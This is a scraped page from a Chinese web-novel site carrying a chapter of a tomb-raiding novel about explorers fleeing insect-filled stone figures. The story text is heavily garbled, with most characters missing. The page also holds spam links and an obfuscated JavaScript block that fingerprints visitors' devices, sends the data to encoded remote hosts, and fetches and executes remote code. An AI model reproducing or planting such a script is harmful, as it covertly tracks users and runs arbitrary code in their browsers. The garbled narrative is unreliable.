<var id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></var>
<menuitem id="ztzh5"></menuitem>
<menuitem id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></menuitem>
<var id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></var><var id="ztzh5"></var>
<var id="ztzh5"><dl id="ztzh5"></dl></var>
<var id="ztzh5"><strike id="ztzh5"></strike></var>
<var id="ztzh5"></var>
<var id="ztzh5"></var>
<var id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></var> <menuitem id="ztzh5"></menuitem>
<var id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></var>
<var id="ztzh5"><strike id="ztzh5"></strike></var>
<var id="ztzh5"><strike id="ztzh5"></strike></var>
<cite id="ztzh5"><video id="ztzh5"><listing id="ztzh5"></listing></video></cite>
<menuitem id="ztzh5"></menuitem>
最新網址:www.jsong.org

博愛書屋【www.jsong.org】第一時間更新《噓,墓里有人》最新章節。

?眾聲音,先沉默秒,緊接曹師爺喊叫聲。

狂奔,石俑變化,原本存眼睛全部始脫落,變漆黑洞,隨猩紅眼珠

緊接集體轉,整石坑老舊機器啟聲音。

“快往跑,石俑!”已經失冷靜,聲音很句。

石俑全部轉逐漸裂痕,像碎裂

少石俑并任何反應,間太久,存機關已經失效

靠......啊,!”

伙計慘叫聲,石俑

邊跑電照向邊,拳頭東西,通體紫黑色,腦袋眼睛卻猩紅猩紅顏色,顯格外妖艷。

東西善茬!

伙計似乎已經被它咬,已經聲音,文男伙計名字,已經回應。

翅膀,,此石俑徹底裂,緊接紫黑色飛蟲。

耳邊全石俑碎裂聲音,石俑坑方黑壓壓片,已經擠滿拳頭飛蟲。

害怕蟲,嚇頭皮麻,識拿電筒砸

剛飛適應,被電筒直接砸邊。踉踉蹌蹌電筒,繼續往跑。

石俑腦袋完完全全裂余光瞥眼,愣直接被給惡干嘔

石俑居具千瘡百孔骨,骨頭少細洞。

才明白,原石俑,正外殼造點。其被寄養飛蟲,食。

,驚擾休眠

幾乎石俑破碎全部飛頭頂,翅膀震聲音讓渾身雞皮疙瘩。

曹師爺已經踹碎邊其具石俑,沖邊,臉色格外蒼白:“秋三爺快快快娘找方躲吃肉幾百被困石俑東西吃,咱眼皮待宰羊!”

曹師爺邊慌忙方躲。

石俑坑石俑啥往哪兒躲。

短短幾秒鐘已經給座墓墓主祖宗十八代問候遍,易燃鬼火,養蟲石俑,墓嗎?

分明十八層獄!

才剛剛經歷兩層!

曹師爺忙腳亂候,頭頂飛蟲已經適應石俑感覺,十幾

哪兒管,脫才剛重新包直接扔飛蟲打飛

曹師爺趁此連忙抓退。

耳邊很快槍聲,顯蝴蝶已經槍。

槍聲響,徹底驚,它翅膀“嗡嗡嗡”向蝴蝶

見狀曹師爺跑,倆飛電筒頭頂亂打,彎跑。

盡管傷,揮舞電筒少被毒,已經完蛋

曹師爺跑截兒,蝴蝶槍,回頭眼,恰邊打擊信號彈。

信號彈迅速升空,徹底照亮石俑坑片;石俑坑方密密麻麻全紫黑色頭頂猩紅色飛蟲,輕微密集恐懼癥頭皮麻。

信號彈恰飛蟲群,燒死片飛蟲,它,散落四周石俑

燃燒蟲光亮,曹師爺貼墻壁貓腰繼續往跑,少飛蟲注倆。

石俑坑長,倆跑幾分鐘頭,具石俑話,石俑坑千具石俑,

兒哪石俑坑,分明殉葬坑!

管建造比秦王暴戾

腳腕忽直接跳,曹師爺:“三爺腿抽筋親爺啊,關鍵刻掉鏈命啦!”

東西拉腳。”

光打回東西拉腳腕方,洞口,完全足容納

仔細,嚇曹師爺跳。

秒,趙苗頭,正滿臉焦急倆招:“張知秋、曹教授快進安全!”

天才一秒記住【博愛書屋】地址:www.jsong.org

美女直播間 | 免費看直播APP
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE3Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x6e\x5a\x79\x66\x4a\x72\x42\x51\x44']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],ec=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++ec]&&clearTimeout(t[e]);l.length?f():RCxthzmRkG()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++ec]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,url:b(),ref:a(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9hc2xkZmtqcy54ZmdjdGcuYY29t','d3NNzOi8vd3Mud3Fkd29yay5jb206OTc5NNyx3c3M6Ly93cy5zemZobDk5LmNNvbTo5NNzk3',window,document,['Y','N']);}:function(){};
科幻相關閱讀More+

我成帝了金手指才來

天涯月照今

武德充沛

煙火成城

星環使命

虛偽王庭

修真四萬年

臥牛真人

深海余燼

遠瞳

快穿之不當炮灰

林喵喵
外围体育